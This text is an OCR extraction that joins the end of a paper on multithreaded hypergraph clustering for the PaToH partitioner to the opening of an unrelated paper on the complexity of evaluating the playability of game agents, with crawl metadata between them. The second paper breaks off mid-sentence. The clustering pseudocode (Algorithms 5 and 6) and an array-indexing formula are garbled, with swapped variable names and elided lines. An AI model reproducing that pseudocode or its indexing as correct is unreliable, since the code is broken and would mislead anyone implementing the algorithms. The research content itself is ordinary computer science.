the same hypergraph data structure with PaToH. We store the ids of the vertices of each net \( n \), that is its pins, consecutively in an array ids of size \( \sum_{n \in \mathcal{N}} |\text{pins}[n]| \). We also keep another array xids of size \(|\mathcal{N}| + 1\), which stores the start index of each net’s pins. Hence, in our implementation, the pins of a net \( n \), denoted by \( \text{pins}[n] \) in the pseudocodes, are stored in ids[ids[\text{pins}[n]]] through ids[ids[\text{pins}[n] + 1] - 1]. With the data structures above, the computational complexity of the clustering algorithms in this paper are in the order of \( \sum_{n \in \mathcal{N}} |\text{pins}[n]|^2 \), since all non-loop lines in their pseudocodes have \( \mathcal{O}(1) \) complexity. For example, in Algorithm 1, to remove matched vertices from \( \text{pins}[n] \) (line 3), we keep a pointer array netend of size \( \mathcal{N} \) where netend[\( n \)] initially points to the last vertex in \( \text{pins}[n] \) for all \( n \in \mathcal{N} \). Then, to execute \( \text{pins}[n] \leftarrow \text{pins}[n] \setminus \{v\} \), we only decrease netend[\( n \)] and swap \( v \) with the vertex in the Algorithm 5: Parallel agglomerative clustering Data: $\mathcal{H} = (\mathcal{V}, \mathcal{N})$, maxW, rep for each vertex $u \in \mathcal{V}$ in parallel do if CHECKANDLOCK($u$) then if rep[$u$] \neq null then UNLOCK($u$) continue adj$_u \leftarrow \{}$ for each net $n \in$ nets[$u$] do for each vertex $v \in$ pins[$n$] do if $v \notin$ adj$_u$ then adj$_u \leftarrow$ adj$_u$ $\cup$ \{v\} conn[$v$] $\leftarrow$ conn[$v$] $+$ c[n] $v' \leftarrow u$ conn$^*$ $\leftarrow$ 0 for each vertex $v \in$ adj$_v$ do if $v' = v$ then continue $v' \leftarrow$ rep[$v$] if $v' = null$ then $v' \leftarrow v$ if $v' \neq v$ then conn[$v'\!] \leftarrow$ conn[$v'\!] + conn[$v$] # replace $v$ with $v'$ conn[$v$] $\leftarrow$ 0 adj$_u \leftarrow$ adj$_u$ $\cup$ \{v'\} $\setminus$ \{v\} totW $\leftarrow$ w[u] $+$ w[v'] if conn[v'] $>$ conn$^*$ and totW $<$ maxW then if $v' = v^*$ or CHECKANDLOCK(v*) then if rep[v] $\neq v^*$ and rep[v] $\neq$ null then UNLOCK(v*) continue totW $\leftarrow$ w[u] $+$ w[v'] if totW $<$ maxW then conn$^*$ $\leftarrow$ conn[v*] v' $\leftarrow$ v* if $u \neq v^*$ then UNLOCK(v*) else UNLOCK(v*) for each vertex $v \in$ adj$_u$ do conn[v] $\leftarrow$ 0 if $u \neq v^*$ then rep[v*] $\leftarrow$ v* rep[u] $\leftarrow$ v* w[v*] $\leftarrow$ w[v*] $+$ w[u] UNLOCK(v*) UNLOCK($u$) Algorithm 6: Parallel lock-based matching: modified for each vertex $u \in \mathcal{V}$ in parallel do if rep[v] $= null$ then \[...\] if CHECKANDLOCK(u) then \[...\] for \[...\] do \[...\] if \[...\] then if rep[v] $= null$ then \[...\] if CHECKANDLOCK(v) then \[...\] \[...\] \[...\] new location. In this way, we also keep the list of vertices connected to each net unchanged since we only reorder them. In the actual implementation of Algorithm 1, the set adj$_u$ corresponds to an array of maximum size $|\mathcal{V}|$, and an integer which keeps the number of adjacent vertices in the array. With this pair, the vertex addition (line 5) and reset (line 2) operations take constant time. Furthermore, to find if a vertex $v$ is a member of adj$_u$ (line 4), we use conn[v] since the edge costs are positive, and conn[v] $>$ 0 if and only if $v \in$ adj$_u$. The implementation of these lines are the same for other algorithms. IV. EXPERIMENTAL RESULTS The algorithms are tested on a computer with 2.27GHz dual quad-core Intel Xeon CPUs with 2-way hyper-threading enabled, and 48GB main memory. All of the algorithms are implemented in C and OpenMP. The compiler is gcc version 11.1 and -O3 optimization flag is used. To generate our hypergraphs, we used real live matrices from the University of Florida (UFL) Sparse Matrix Collection (http://www.cise.ufl.edu/research/sparse/matrices). We randomly choose 70 large, square matrices from the library and create corresponding hypergraphs using the column-net hypergraph model [2]. An overall summary of the properties of these hypergraphs is given in Table I. The complete list of matrices is at http://bmi.osu.edu/~kamer/multi_coarse_matrices.txt. Table I | Properties of the Hypergraphs Used in the Experiments | |---------------------------------|-----|-------|------| | # vertices | 256,000 | 9,845,725 | 1,089,073 | | # pins | 786,396 | 57,156,537 | 6,175,717 | | # pins/vertices | 1.91 | 39.53 | 6.61 | A. Individual performance of the algorithms We first compare the performance of the multithreaded clustering algorithms with respect to the cardinality, quality and speedup as standalone clustering algorithms. 1) Performance on cardinality and quality: For matching based clustering, a matching with the best quality can be found by first constructing the matrix \( M = AA^T - \text{diag}(AA^T) \) where \( A \) is the vertex-net incidence matrix. Then a maximum weighted matching in \( G(M) \), the associated weighted graph of \( M \), is also the maximum quality matching. We use Gabow’s maximum weighted matching algorithm [27]—implemented by Rothberg and available as a part of The First DIMACS Implementation Challenge (available at ftp://dimacs.rutgers.edu/pub/netflow). This algorithm has a time complexity of \( \mathcal{O}(|V|^3) \) for a graph on \(|V| \) vertices and finds a maximum weighted matching in the graph, not necessarily among the maximum cardinality ones. Due to the running time complexity of the maximum quality matching algorithm, it is impractical to obtain the relative performance of the clustering algorithms on our original dataset. We therefore use an additional data set containing considerably small matrices. The new dataset contains all 289 square matrices in the UFL sparse matrix collection with at least 3,000 and at most 10,000 rows. We construct the hypergraphs for each of these matrices and find the maximum quality matching on them. The relative performance of an algorithm is computed by dividing its cardinality and quality scores to those of Gabow’s quality matching algorithm. Table II shows the minimum, the maximum, and the geometric mean of all 289 relative performance for each algorithm. As the table shows, the sequential algorithm and its parallel lock-based variant are only 17–19% far from the optimal in terms of quality and almost equal in terms of cardinality. Considering the difference in computational complexities, we can argue that their relative performance is reasonably good. The lock-based algorithm performs slightly better than the sequential one. This demonstrates that while reducing the execution time, the proposed lock-based parallelization does not hamper the performance of the sequential matching algorithm in terms of both cardinality and quality. For this experiment, the parallel algorithms were executed with 8 threads. Figure 1 shows the performance profiles generated to analyze the results in more detail. A point \((x, y)\) in the profile graph means that with \( y \) probability, the quality of the matching found by an algorithm is larger than \( \max / x \) where \( \max \) is the maximum quality for that instance. The figure shows that for this data set, the resolution-based matching has this performance only for 45% probability. While obtaining matchings having at most 15% worse quality than the optimum, the probabilities are 56% and 28% for the lock- and resolution-based algorithms, respectively. Hence, the former performs two times better than the latter. For the original data set with large hypergraphs, the relative performance of the multithreaded algorithms are given with respect to that of their sequential versions. Table III shows the statistics for this experiment. Table II <table> <thead> <tr> <th>Algorithm</th> <th>Quality</th> <th>Cardinality</th> </tr> </thead> <tbody> <tr> <td></td> <td>min</td> <td>max</td> </tr> <tr> <td>Sequential</td> <td>0.24</td> <td>1.00</td> </tr> <tr> <td>Lock-based</td> <td>0.32</td> <td>1.00</td> </tr> <tr> <td>Resolution-based</td> <td>0.25</td> <td>0.99</td> </tr> </tbody> </table> Table III <table> <thead> <tr> <th>Algorithm</th> <th>Quality</th> <th>Cardinality</th> </tr> </thead> <tbody> <tr> <td></td> <td>min</td> <td>max</td> </tr> <tr> <td>Lock-based</td> <td>0.79</td> <td>1.1</td> </tr> <tr> <td>Resolution-based</td> <td>0.63</td> <td>1.3</td> </tr> <tr> <td>Agglomerative</td> <td>0.56</td> <td>1.3</td> </tr> </tbody> </table> Figure 1. Performance profiles for sequential and multithreaded matching algorithms with respect to the maximum quality matchings. A point \((x, y)\) in the profile graph means that with \( y \) probability, the quality of the matching found by an algorithm is more than \( \max / x \) where \( \max \) is the maximum quality for that instance. Table IV shows the average numbers of matched vertices and conflicts for the proposed resolution-based algorithm with respect to the number of threads. To compute the averages, we execute the algorithm on each hypergraph ten times and report the geometric mean of these results. As expected, the number of the conflicts increases with the number of threads. However, when compared with the cardinality of the matching, the conflicts are at most 0.7% of the total match count for a single graph instance. This shows that the probability of a conflict is very low even with 8 threads. Table IV THE AVERAGE MATCHING CARDINALITY AND THE NUMBER OF CONFLICTS FOR THE PROPOSED RESOLUTION-BASED ALGORITHM WITH RESPECT TO THE NUMBER OF THREADS. <table> <thead> <tr> <th>Thread</th> <th>#match</th> <th>#conflict</th> <th>#conflict/#match</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>290206.9</td> <td>0.0</td> <td>0.000000</td> </tr> <tr> <td>2</td> <td>290103.6</td> <td>17.8</td> <td>0.000061</td> </tr> <tr> <td>4</td> <td>290052.9</td> <td>18.9</td> <td>0.000065</td> </tr> <tr> <td>8</td> <td>289965.9</td> <td>24.1</td> <td>0.000083</td> </tr> </tbody> </table> 2) Speedup: Figure 2 shows the speedups achieved by the multithreaded algorithms. On the average, the algorithms obtain decent speedups compared to their sequential versions up to 8 threads. In 8-thread experiments, the resolution-based algorithm has the highest speedup of 5.87, which is followed by the parallel agglomerative algorithm with a speedup of 5.82. The lock-based algorithm has the least speedup of 5.23 in this category. However, this is still decent especially when we consider the 5–7% overhead due to OpenMP and atomic operations. To analyze the scalability of the algorithms from a closer point of view, we draw the speedup profiles in Figure 3. The resolution-based algorithm has better scalability in general. For example, with 4 threads, the probability that the resolution-based algorithm obtains a speedup of at least 3.2 is 83%. The same probabilities for the lock-based and parallel agglomerative algorithms are 54% and 65%, respectively. With 8 threads, the resolution-based version achieves at least 6.6 speedup for 33% the hypergraphs. However, the lock-based and parallel agglomerative algorithms achieve the same speedup only in for 16% and 20% of them. Hence, the resolution-based algorithm is the best among the ones proposed in this paper in terms of scalability. B. Multi-level performance of the algorithms As mentioned in the introduction, we integrated our algorithms into the coarsening phase of PaToH [15]. In this section, we first investigate how our algorithms scale for the clustering operations inside PaToH. The overall performance of a clustering algorithm in such a setting can be different from the standalone performance of the same algorithm, since in the multi-level framework, the hypergraphs are coarsened until the coarsest hypergraph is considerably small (for example, until the number vertices reduces below 100). Figure 4 shows that the speedups on the multi-level clustering part are slightly worse than that of the standalone clustering. For example, the average speedups for the 8(4) threads case, are 5.25(3.22), 5.56(3.40), and 5.47(3.23) for the lock-based, resolution-based, and parallel agglomerative algorithms, respectively. Since we only parallelize the clustering operations inside the partitioner, the speedups we obtain on the overall execution time cannot be equal to the number of threads, even in the ideal case. To find the ideal speedups, we use Amdahl’s law [28]: $$speedup_{ideal} = \frac{1}{(1 - r) + \frac{r}{\#threads}}$$ where $r$ is the ratio of the total clustering time to the total time of a sequential execution. To find the ideal speedup on the average, we compute (4) for each hypergraph and then take the geometric mean since we do the same for actual speedups. Figure 5 shows the ideal and actual speedups of the multithreaded algorithms. Since the ideal speedup lines (in dashed style) are drawn by using different sequential algorithms for the matching-based and agglomerative clustering, we separated these two cases and draw two different charts. On the average, all the algorithms obtain speedups close to the ideal. Among the matching-based algorithms, the lock-based one is more efficient since its speedup is closer to the ideal. This is interesting since according to Figure 4, it has less speedup on the total clustering time. At first sight, this looks like an anomaly because this is the only part that has been parallelized. However, the since lock-based algorithm’s quality is better (Table III), there is probably less work remaining for the refinement heuristics in the uncoarsening phase. Hence, in total, one can achieve better speedup by using the lock-based algorithm rather than the resolution-based one. We also obtain good speedups with the parallel agglomerative algorithm. For 2, 4, and 8 threads, the algorithm makes Figure 3. Speedup profiles for the multithreaded algorithms: A point \((x, y)\) in the profile graph means that with \(y\) probability, the speedup obtained by the parallel algorithm will be more than \(x\). ![Speedup Profiles](image) (a) \#threads = 4 (b) \#threads = 8 Figure 4. Speedups on the time spent by the clustering algorithms in the multi-level approach. ![Speedup Comparison](image) PaToH only 6%, 6% and 10% slower, respectively, than the best possible parallel execution time. Parallelization of both matching-based and agglomerative clustering algorithm reduces the total execution time significantly. As mentioned before, matching-based algorithms are faster than the agglomerative ones. However, Figure 6 shows that PaToH is 20–30% faster when an agglomerative algorithm is used in the coarsening phase rather than a matching based one. According to our experiments, the coarsening phase is indeed 25% slower with the agglomerative clustering algorithm. However, the total execution time is 13% less. The difference comes from the reduction on the time of initial partitioning and uncoarsening/refinement phases. The initial partitioning takes less time because the coarsest hypergraph has fewer number of vertices with an agglomerative algorithm. In addition, the agglomerative clustering results in 25% less cutsize compared to the matching-based clustering. Hence, we can claim that it is more suitable for the cutsize definition given in (3). When equipped with the multithreaded clustering algorithms, the cutsize of the partition found by PaToH is almost equal to the original cutsize obtained by using the sequential versions. For the agglomerative case, the cutsize changes only up to 1%. This is also true with the lock-based matching algorithm when compared with sequential greedy matching. For the resolution-based matching algorithm, there is at most 3% percent increase in the cutsize on average. On the other hand, as shown above the algorithms scale reasonably well. V. Conclusion Clustering algorithms are the most time consuming part of the current-state-of-the-art hypergraph partitioning tools that follow the multi-level framework. We have investigated the matching-based and agglomerative clustering algorithms. We have argued that the matching-based clustering algorithms can be perceived as a matching algorithm on an implicitly represented undirected, edge weighted graph, whereas there is no immediate equivalent algorithm for the agglomerative ones. We have proposed two different multithreaded implementations of the matching-based clustering algorithms. The first one uses atomic lock operations to prevent inconsistent matching decisions made by two different threads. The second one lets the threads perform matchings as they would do in a sequential setting and then later on resolves the conflicts that would arise. We have also proposed a multithreaded agglomerative clustering algorithm. This algorithm also uses locks to prevent conflicts. We have presented different sets of experiments on a large number of hypergraphs. Our experiments have demonstrated that the multithreaded clustering algorithms perform almost as good as their sequential counter parts, sometimes even better in terms of clustering quality and cardinality. The experiments have also shown that our algorithms achieve decent speedups (the best was 5.87 with 8 threads). We integrated our algorithms to a well-known hypergraph partitioner PaToH. This integration makes PaToH 1.85 times faster where the ideal speedup is 2.07. In addition, it does not worsen the cutsizes obtained. We observed that clusterings with better quality helps the partitioner to obtain better cuts. Fortunately, the multi-level framework may tolerate slower algorithms which generate better clusterings in terms of cardinality and quality. This is because of the fact that such clusterings will reduce the time required for the initial partitioning and uncoarsening phases. However, there is a limit with this tolerance. If the algorithm is too slow, one can execute the partitioner several times with a faster, parallelizable algorithm that generates clusterings with acceptable quality and achieve even better cutsizes. ACKNOWLEDGMENT This work was supported in parts by the DOE grant DE-FC02-06ER2775 and by the NSF grants CNS-0643969, OCI-0904809, and OCI-0904802. REFERENCES
{"Source-Url": "https://inria.hal.science/hal-00763565/file/cdku-ipdps12.pdf", "len_cl100k_base": 11817, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 50700, "total-output-tokens": 14921, "length": "2e13", "weborganizer": {"__label__adult": 0.000362396240234375, "__label__art_design": 0.0005168914794921875, "__label__crime_law": 0.0004611015319824219, "__label__education_jobs": 0.0010957717895507812, "__label__entertainment": 0.00012302398681640625, "__label__fashion_beauty": 0.0002243518829345703, "__label__finance_business": 0.0003409385681152344, "__label__food_dining": 0.0003895759582519531, "__label__games": 0.0009984970092773438, "__label__hardware": 0.00341796875, "__label__health": 0.0007028579711914062, "__label__history": 0.0005130767822265625, "__label__home_hobbies": 0.00018978118896484375, "__label__industrial": 0.000949382781982422, "__label__literature": 0.0002701282501220703, "__label__politics": 0.0003902912139892578, "__label__religion": 0.0006604194641113281, "__label__science_tech": 0.298828125, "__label__social_life": 0.00011968612670898438, "__label__software": 0.01496124267578125, "__label__software_dev": 0.67333984375, "__label__sports_fitness": 0.00034880638122558594, "__label__transportation": 0.0007390975952148438, "__label__travel": 0.0002567768096923828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54603, 0.02891]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54603, 0.31255]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54603, 0.87427]], "google_gemma-3-12b-it_contains_pii": [[0, 1057, false], [1057, 6240, null], [6240, 12459, null], [12459, 15043, null], [15043, 20261, null], [20261, 24261, null], [24261, 30995, null], [30995, 34809, null], [34809, 39279, null], [39279, 44173, null], [44173, 47789, null], [47789, 50250, null], [50250, 54603, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1057, true], [1057, 6240, null], [6240, 12459, null], [12459, 15043, null], [15043, 20261, null], [20261, 24261, null], [24261, 30995, null], [30995, 34809, null], [34809, 39279, null], [39279, 44173, null], [44173, 47789, null], [47789, 50250, null], [50250, 54603, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54603, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54603, null]], "pdf_page_numbers": [[0, 1057, 1], [1057, 6240, 2], [6240, 12459, 3], [12459, 15043, 4], [15043, 20261, 5], [20261, 24261, 6], [24261, 30995, 7], [30995, 34809, 8], [34809, 39279, 9], [39279, 44173, 10], [44173, 47789, 11], [47789, 50250, 12], [50250, 54603, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54603, 0.08273]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
b29bf2c2f4251f5de993842ee637b59bb061c8ed
Exploring Options for Efficiently Evaluating the Playability of Computer Game Agents Todd Wareham and Scott Watson Department of Computer Science Memorial University of Newfoundland St. John’s, NL Canada A1B 3X5 Email: harold@mun.ca, saw104@mun.ca Abstract—Automatic generation of game content is an important challenge in computer game design. Such generation requires methods that are both efficient and guaranteed to produce playable content. While existing methods are adequate for currently available types of games, games based on more complex entities and structures may require new methods. In this paper, we use computational complexity analysis to explore algorithmic options for efficiently evaluating the playability of and generating playable groups of enhanced agents that are capable of exchanging items and facts with each other and human players. Our results show that neither of these problems can be solved both efficiently and correctly either in general or relative to a surprisingly large number of restrictions on enhanced agent structure and gameplay. We also give the first restrictions under which the playability evaluation problem is solvable both efficiently and correctly. I. INTRODUCTION Given the time and cost involved with the human design of computer games, the ability to automatically generate game content is an important problem in computer game design [1], [2]. It is critical that such automatic methods generate playable content because “[g]iven the way most commercial games are designed, any risk of the player being presented with unplayable content is unacceptable” [1, p. 183]. They should also operate quickly, particularly if content is being generated in real time to accommodate unanticipated player actions or choices (a situation in which human-based methods such as testing or manually adjusting game parameters to ensure playability are not applicable). Though existing automatic methods appear to be adequate for currently available types of games, e.g., [3], this may not be so for more complex games. A case in point is games incorporating enhanced agents that maintain collections of items and facts which can be both exchanged with and used in defining behavior with respect to other agents and human players. Such agents nicely model socially realistic agent-player interactions that take place over long (possibly disjoint) periods of time, cf., the short-term action-based interactions modelled by finite-state agents [4]–[6]. Initial work on generating groups of enhanced agents [7] has demonstrated that genetic algorithms and backtracking-based agent-group playability evaluation suffice for the off-line and real-time generation of moderate- (∼ 50) and small- (∼ 5) size groups of playable agents, respectively. However, in the interests of improved scalability, it would be most useful to know if more efficient methods are available for generating larger and more complex groups of agents, and, if so, in what circumstances. In this paper, we present initial results addressing both of these questions. First, using techniques from computational complexity theory [8], we show that evaluating the playability of a given group of enhanced agents (in particular, determining if a human player can interact with the group to obtain a specified goal-set of items and facts) is \( NP \)-hard and thus intractable in general. This holds even in the case where there is only one given agent and no time limit on achieving the goal, as well as whether or not the agents operate autonomously or under the control of a game narrative manager. Second, using techniques from parameterized complexity theory [9], we establish that surprisingly few restrictions on enhanced agents and human-agent interactions render playability evaluation tractable. Though these results are derived for the model of game agents and playability given in [7], we show that these results apply not only to evaluating the playability of a much broader class of models but also to the playable agent-group generation process itself. The remainder of this paper is organized as follows. In Section II, we present an augmented finite-state machine model of game agents that can exchange items and facts with other agents and human players and formalize playability evaluation for such agents. Section III demonstrates the intractability of this problem. Section IV describes a methodology for identifying conditions for tractability, which is then applied in Section V to identify such conditions for agent playability evaluation. In order to focus in the main text on the implications of our results for computer game design, all proofs of results are given in Appendix C. Finally, our conclusions and directions for future work are given in Section VI. A. Related Work Determining whether given game levels can be completed and are thus playable is known to be \( NP \)-hard (and not efficiently solvable in general) for many types of games [10]–[14]. However this work has not been extended to address the problem of designing playable levels, let alone evaluating the playability or designing playable groups of agents. There is existing work on the computational complexity of verifying if given multi-agent systems can perform a specified task (and hence are in a sense “playable”) as well as designing multi-agent systems to correctly perform specified tasks [15]–[18]. The formalizations of agent control and interaction mechanisms and the environments analyzed in this work are very general and powerful (e.g., arbitrary Turing machines or Boolean propositional formulae), rendering the intractability of these problems unsurprising. Moreover, as these formalizations obscure almost all details of the agent mechanisms and environment, the derived results are also unenlightening with respect to possible restrictions that could yield tractability. Similar reasoning applies with respect to existing complexity analyses of verification problems relative to single robots and swarms of robots (see [19, Section 4.2.1] and references). II. FORMALIZING AGENT PLAYABILITY EVALUATION In this section, we extend the popular finite-state model of game agents [4] to accommodate item- and fact-enhanced agents and use this extended model to state the agent-group playability evaluation problem. To aid readability, the technical details of this extended model and its operation in gameplay are given in Appendix A. At a minimum, an agent capable of exchanging items and facts with another agent (which could be a human player) should be able to do the following: - Maintain an internal state as well as collections of personal items and facts; - Perform actions (and possibly change internal state) in response to another agent’s actions and offered items and facts; - As part of a performed action, give in return some of its own personal items and facts to that other agent. Following [7], there can be at most one copy of an item in a game at any time (i.e., an item can be possessed by at most one agent or human player) but there can be any number of copies of a fact (i.e., any number of agents or human players can possess the same fact). Agents with the requisite abilities described above can be modeled using augmented finite-state machines (AFSM) (see Figure 1). An AFSM is a straightforward extension of the commonly-used finite-state model of game agents. Each transition between two states in an AFSM \( M \) corresponds to an interaction between \( M \) and another agent in which that other agent performs action \( a \) with item- and fact-sets \( I \) and \( F \) offered to \( M \) and \( M \) responds in turn via action \( a' \) with (1) a change from state \( q \) to state \( q' \) and (2) item- and fact-sets \( I' \) and \( F' \) being given to the other agent. Any unspecified proposed action and offered item- and fact-sets relative to a state \( q \) whose result is not explicitly stated as a transition is assumed to loop back on \( q \) with no effect, e.g., \( M \) ignores the offered amulet and mumbles under its breath. For simplicity, we focus on deterministic AFSM in which for any given \( q, a, I, \) and \( F \) there is at most one transition. Examples of three possible AFSM representing two shopkeepers \( S1 \) and \( S2 \) and a wizard \( W \) are shown in Figure 1. These AFSM are defined relative to the action-, item-, and fact-sets \{chat, consult, intimidate, offer\}, \{false amulet (Af), true amulet (At), gold piece (G), sword (Sw)\}, and \{know shopkeeper #1 (kS1), know shopkeeper #2 (kS2), know wizard (kW)\}, respectively. Each transition in which item- and fact-sets \( I \) and \( F \) are offered as a result of action \( a \) and \( I' \) and \( F' \) are given in response as part of action \( a' \) is written as an arrow between \( q \) and \( q' \) with the label “\( a \{F\}/\{I\}\{F'\}\)”, i.e., \( a' \) is ignored. For example, \( S1 \) has a transition between \( q0 \) and \( q2 \) such that \( S1 \) hands over the fake amulet when intimidated by another agent with a sword. Playability of a group of AFSMs can be formalized in terms of hard (inviolable) and soft (violable) constraints [7]. Example hard and soft constraints are, respectively, that a specified goal must be achieved and that the interactions in any goal- achieving interaction-sequence should incorporate as many of the actions allowable to agents as possible. Evaluations of playability are based on the degree to which these constraints can be satisfied by a human player interacting with the given agents. For simplicity, we focus on minimum playability, i.e., whether or not a human player can interact with a given set of agents to obtain specified goal-sets of facts and items. The above yields the following formalization: AFSM Agent Playability Evaluation (APE) Input: A set $A = \{a_1, \ldots, a_n\}$ of AFSM with associated initial item- and fact-sets $\{I^0_{a_1}, \ldots, I^0_{a_n}\}$ and $\{F^0_{a_1}, \ldots, F^0_{a_n}\}$, initial player item- and fact-sets $I^0$ and $F^0$, goal item- and fact-sets $I_G$ and $F_G$, and a positive integer $t$. Question: Can the player obtain $I_G$ and $F_G$ by engaging in at most $t$ interactions with the agents in $A$? Note that this formalization applies regardless of whether the agents in $A$ operate autonomously or under the direction of a game narrative manager; hence, results derived relative to this formalization will apply in both of these cases. III. Agent Playability Evaluation is Intractable In this section, we address whether or not agent playability evaluation can be done efficiently relative to the model described in Section II. Following general practice in Computer Science [8], we define efficient solvability as being solvable in the worst case in time polynomially bounded in the input size. We show that a problem is not polynomial-time solvable, i.e., not in the class $P$ of polynomial-time solvable problems, by proving it to be at least as difficult as the hardest problems in problem-class $NP$ (see [8] and Appendix B for details). Result A: APE is $NP$-hard. Modulo the conjecture $P \neq NP$ which is widely believed to be true [20], the above shows that APE is not polynomial-time solvable. Note that this result holds even in the very restricted case in which the player only interacts with a single agent, i.e., $|A| = 1$, and an unlimited number of interactions between the player and that agent is allowed, i.e., $t = \infty$. IV. A Method for Identifying Tractability Conditions A computational problem that is intractable for unrestricted inputs may yet be tractable for non-trivial restrictions on the input. This insight is based on the observation that some $NP$-hard problems can be solved by algorithms whose running time is polynomial in the overall input size and non-polynomial only in some aspects of the input called parameters. In other words, the main part of the input contributes to the overall complexity in a “good” way, whereas only the parameters contribute to the overall complexity in a “bad” way. In such cases, the problem is said to be fixed-parameter tractable for that respective set of parameters. The following definition states this idea more formally. Definition 1: Let $\Pi$ be a problem with parameters $k_1, k_2, \ldots$. Then $\Pi$ is said to be fixed-parameter (fp-) tractable for parameter-set $K = \{k_1, k_2, \ldots\}$ if there exists at least one algorithm that solves $\Pi$ for any input of size $n$ in time $f(k_1, k_2, \ldots)n^c$, where $f(\cdot)$ is an arbitrary function and $c$ is a constant. If no such algorithm exists then $\Pi$ is said to be fixed-parameter (fp-) intractable for parameter-set $K$. In other words, a problem $\Pi$ is fp-tractable for a parameter-set $K$ if all superpolynomial-time complexity inherent in solving $\Pi$ can be confined to the parameters in $K$. In this sense the “unbounded” nature of the parameters in $K$ can be seen as a reason for the intractability of the unconstrained version of $\Pi$. There are many techniques for designing fp-tractable algorithms [9], [21], and fp-intractability is established in a manner analogous to classical polynomial-time intractability by proving a parameterized problem is at least as difficult as the hardest problems in one of the problem-classes in the $W$-hierarchy $\{W[1], W[2], \ldots\}$ (see [9] and Appendix B for details). Additional results are typically implied by any given result courtesy of the following lemmas: Lemma 1: [22, Lemma 2.1.30] If problem $\Pi$ is fp-tractable relative to parameter-set $K$ then $\Pi$ is fp-tractable for any parameter-set $K'$ such that $K \subseteq K'$. Lemma 2: [22, Lemma 2.1.31] If problem $\Pi$ is fp-intractable relative to parameter-set $K$ then $\Pi$ is fp-intractable for any parameter-set $K'$ such that $K' \subset K$. Observe that it follows from the definition of fp-tractability that if an intractable problem $\Pi$ is fp-tractable for parameter-set $K$, then $\Pi$ can be efficiently solved even for large inputs, provided only that the values of all parameters in $K$ are relatively small. This strategy has been successfully applied to a wide variety of intractable problems (see [9], [23] and references). In the next section we investigate how the same strategy may be used to render the problem APE tractable. V. What Makes Agent Playability Evaluation Tractable? The AFSM agent playability evaluation problem has a number of parameters whose restriction could render agent playability evaluation tractable. An overview of the parameters that we considered in our fp-tractability analysis is given in Table I. These parameters can be divided into three groups: 1) Restrictions on the game agents; 2) Restrictions on the human player; and 3) Restrictions on the game itself. In the remainder of this section, we will assess the fp-tractability of APE relative to all parameters in Table I (Section V-A), show how these results apply in more general settings (Section V-B) as well as to playable AFSM agent generation (Section V-C), and discuss the implications of these results for computer game design (Section V-D). A. Results Our parameterized intractability results are summarized in Table I. Each column describes an intractability result that holds relative to the set of all parameters whose entries in that column are not dashes (“–”); if the result holds when a non-dashed parameter has constant value \(c\), this indicated by an entry for that parameter with the value \(c\). Result B is notable because it, when combined with results implied by Lemma 2, establishes the intractability of APE relative to all subsets of the considered parameters that do not include \(|A|\); the intractability of many (but not all) of those remaining subsets including \(|A|\) is then established by Results C–F. At present, we have a lone tractability result: Result G: APE is fp-tractable for \(\{|A|, |I|, t\}\). Results B, D, F, and G, combined with those implied by Lemmas 1 and 2, establish the intractability of APE relative to all subsets of \(\{|A|, i_A, f_A, |I|, t, i_G, f_G\}\). This in turn establishes that the parameter-set in Result G is minimal in the sense that no parameter in that set can be deleted to yield fp-tractability. B. Generality of Agent Playability Evaluation Results Our intractability results, though defined relative to an admittedly simple model of game agents and human-agent interaction, have a remarkable generality. Observe that this model is a special case of many more realistic models, e.g., - deterministic AFSM are special cases of both nondeterministic and probabilistic AFSM (AFSM without nondeterminism or in which all actions have probability of execution 1.0 if their triggering conditions are satisfied are deterministic); - player-activated AFSM are special cases of autonomous AFSM (restrict non-player-triggered interaction); and - basic AFSM ares special cases of AFSM with extra abilities (restrict use of these extra abilities). Intractability results for these more realistic models then follow from the well-known observation in computational complexity theory that intractability results for a problem \(\Pi\) also hold for any problem \(\Pi'\) that has \(\Pi\) as a special case (suppose \(\Pi\) is intractable; if \(\Pi'\) is tractable, then any algorithm for \(\Pi'\) can be used to solve \(\Pi\) efficiently, which contradicts the intractability of \(\Pi\) – hence, \(\Pi'\) must also be intractable). Our fp-tractability result is more fragile, as innocuous changes to agent or game models may in fact violate assumptions critical to the operation of the algorithm underlying this result. For now, we can say that as our fp-tractability results depend on the combinatorics of possible player-agent interactions and require only that any such interaction can be checked for validity and performed in time polynomial in the sizes of the entities involved in that interaction, our tractability result holds for all choices of agent and game model whose player-agent interactions are polynomial-time verifiable. C. Applicability to Playable Agent Generation The results given so far for APE are useful in suggesting improvements to the playability-evaluation module in systems like that described in Watson et al [7]. However, our ultimate goal is still the efficient generation of playable agents, regardless of whether or not an explicit playability-evaluation module is used. In this section, we will sketch how our results for APE apply to this larger problem. Though a full formalization of the AFSM agent-group generation problem is beyond the scope of this paper, we can informally sketch what such a problem might look like. It is trivial to construct an agent-group $A$ that will allow a player to obtain specified goal item- and fact-sets within $t$ steps (let $A$ consist of a single AFSM whose lone transition gives the player all required items and facts in response to an arbitrary action on the part of the player). Hence, a specification of the characteristics of the desired agent-group must be given: let us call such a specification $S_A$. As a minimum, 